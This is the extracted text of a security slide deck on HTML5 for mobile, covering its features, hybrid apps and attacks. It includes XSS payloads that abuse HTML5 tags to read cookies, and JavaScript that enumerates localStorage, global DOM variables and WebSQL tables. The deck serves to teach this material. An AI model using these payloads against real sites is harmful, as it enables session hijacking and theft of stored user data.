Html5 on mobile

© Blueinfy Solutions
HTML5 and Mobile

What is HTML5
• Enhancement to HTML 4.01
– with more tags
– API Support
– Functionality to support mobile devices
– More types for existing tags
• Does not mean old tags will not work
• Existing application can be converted by
changing “<!DOCTYPE html>” in first line

HTML5 in Mobile
• It is changing the game
• Apps are migrating to HTML5 and no need to
use native
• Web vs. Mobile
– Both can use HTML5
– No need to manage several code base
– HTML+CSS+JS only
– Server side services

Technology Vectors

What is running - where???
Presentation Layer
Business Layer
Data Access Layer
Authentication
Communication etc.
Runtime, Platform, Operating System Components
Server side
Components
Client side
Components
(Browser)
• HTML 5
• DOM
• XHR
• WebSocket
• Storage
• WebSQL
• Flash
• Flex
• AMF
• Silverlight • WCF
• XAML
• NET
• Storage
• JS
• Android
• iPhone/Pad
• Other
Mobile

HTML5 in nutshell - Specs
6
Source:
http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png
Source: http://html5demos.com/
Evolution going on by Web Hypertext Application Technology Working Group
(WHATWG)

Key HTML5 features for Mobile
• Offline web application support
• Web Storage
• GeoLocation API
• Canvas 2D Drawing
• Video and Audio streaming support
7

HTML5 features not supported on
Mobile
• Microdata
• 3D animation
• FileReader API
• IndexDB
• WebWorkers
8

API (Media, Geo etc.) & Messaging Plug-In
Modern Browser Model
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS/Content-Sec Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
FileSystem

Abusing HTML 5 Tags
• Various new tags and can be abused, may not
be filtered or validated
• Media tags
<video poster=javascript:alert(document.cookie)//
<audio><source onerror="javascript:alert(document.cookie)">
• Form tags
<form><button formaction="javascript:alert(document.cookie)">foo
<body oninput=alert(document.cookie)><input autofocus>
10

Accessing media tags

Moving/Touch

Login cookie

Profile
• Fetch through storage – cookie not needed…

WebSQL data
• Through JavaScript one can store information
on database.
• Example
15

One time fetch

Network calls
• HTML 5 provides WebSocket and XHR Level 2
calls
• It allows to make cross domains call and raw
socket capabilities
• It can be leveraged by JavaScript payload
• Malware or worm can use it to perform
several scanning tasks
17

Same Origin Policy (SOP)
• Browser’s sandbox
– Protocol, Host and Port should match
– It is possible to set document.domain to parent
domain if current context is child domain
– Top level domain (TLD) locking down helps in
sandboxing the context
18

Fetching Location

Location calls

Hybrid App
• Android

Integrating native to webview
• Hook your handlers to make it hybrid
• Interact with webview

Set permissions
• Manifest file

Loading Hybrid App

Slidebar type touch views

HTML5 Attacks

XSS with HTML5 (tags, attributes and
events)
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache

HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas
(getImageData), menu, embed,
buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox,
manifest, rel etc.
• Events/Objects – Navigation (_self), Editable
content, Drag-Drop APIs, pushState (History)
etc.
28

XSS variants
• Media tags
• Examples
– <video><source onerror="javascript:alert(1)“>
– <video onerror="javascript:alert(1)"><source>
29

XSS variants
• Exploiting autofocus
– <input autofocus onfocus=alert(1)>
– <select autofocus onfocus=alert(1)>
– <textarea autofocus onfocus=alert(1)>
– <keygen autofocus onfocus=alert(1)>
30

XSS variants
• Form & Button etc.
– <form id="test" /><button form="test"
formaction="javascript:alert(1)">test
– <form><button
formaction="javascript:alert(1)">test
• Etc … and more …
– Nice HTML5 XSS cheat sheet
(http://html5sec.org/)
31

• Once have an entry point – game over!
Extraction through XSS

Web Storage and DOM information
extraction
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache

Web Storage Extraction
• Browser has one place to store data – Cookie
(limited and replayed)
• HTML5 – Storage API provided (Local and
Session)
• Can hold global scoped variables
• http://www.w3.org/TR/webstorage/
34

Web Storage Extraction
• It is possible to steal them through XSS or via
JavaScript
• Session hijacking – HttpOnly of no use
• getItem and setItem calls
• XSS the box and scan through storage

Blind storage enumeration
if(localStorage.length){
console.log(localStorage.length)
for(i in localStorage){
console.log(i)
console.log(localStorage.getItem(i));
}
}
• Above code allows all storage variable
extraction
36

• HTML5 provides virtual file system with
filesystem APIs
– window.requestFileSystem =
window.requestFileSystem ||
window.webkitRequestFileSystem;
• It becomes a full blown local system for
application in sandbox
• It empowers application
File System Storage

• It provides temporary or permanent file
system
function init() {
window.requestFileSystem(window.TEMPORARY, 1024*1024,
function(filesystem) {
filesys = filesystem;
}, catcherror);
}
• App can have full filesystem in place now.
File System Storage

• Assuming app is creating profile on local
system
Sensitive information filesystem

DOM Storage
• Applications run with “rich” DOM
• JavaScript sets several variables and
parameters while loading – GLOBALS
• It has sensitive information and what if they
are GLOBAL and remains during the life of
application
• It can be retrieved with XSS
• HTTP request and response are going through
JavaScripts (XHR) – what about those vars?

Blind Enumeration
for(i in window){
obj=window[i];
try{
if(typeof(obj)=="string"){
console.log(i);
console.log(obj.toString());
}
}catch(ex){}
}
41

Global Sensitive Information Extraction from DOM
• HTML5 apps running on Single DOM
• Having several key global variables, objects
and array
– var arrayGlobals =
['my@email.com',"12141hewvsdr9321343423mjf
dvint","test.com"];
• Post DOM based exploitation possible and
harvesting all these values.
42

Global Sensitive Information Extraction from DOM
for(i in window){
obj=window[i];
if(obj!=null||obj!=undefined)
var type = typeof(obj);
if(type=="object"||type=="string")
{
console.log("Name:"+i)
try{
my=JSON.stringify(obj);
console.log(my)
}catch(ex){}
}
}
43

SQL Injection
• WebSQL is part of HTML 5 specification, it
provides SQL database to the browser itself.
• Allows one time data loading and offline
browsing capabilities.
• Causes security concern and potential
injection points.
• Methods and calls are possible

SQL Injection
• Through JavaScript one can harvest entire
local database.
• Example

Blind WebSQL Enumeration
• We need following to exploit
– Database object
– Table structure created on SQLite
– User table on which we need to run select query
46

var dbo;
var table;
var usertable;
for(i in window){
obj = window[i];
try{
if(obj.constructor.name=="Database"){
dbo = obj;
obj.transaction(function(tx){
tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'',
[],function(tx,results){
table=results;
},null);
});
}
}catch(ex){}
}
if(table.rows.length>1)
usertable=table.rows.item(1).name;
47

• We will run through all objects and get object
where constructor is “Database”
• We will make Select query directly to
sqlite_master database
• We will grab 1st
table leaving webkit table on
0th
entry
48

49

Conclusion

Html5 on mobile

More Related Content

What's hot (20)

Viewers also liked (17)

Similar to Html5 on mobile (20)

More from Blueinfy Solutions (12)

Recently uploaded (20)

Html5 on mobile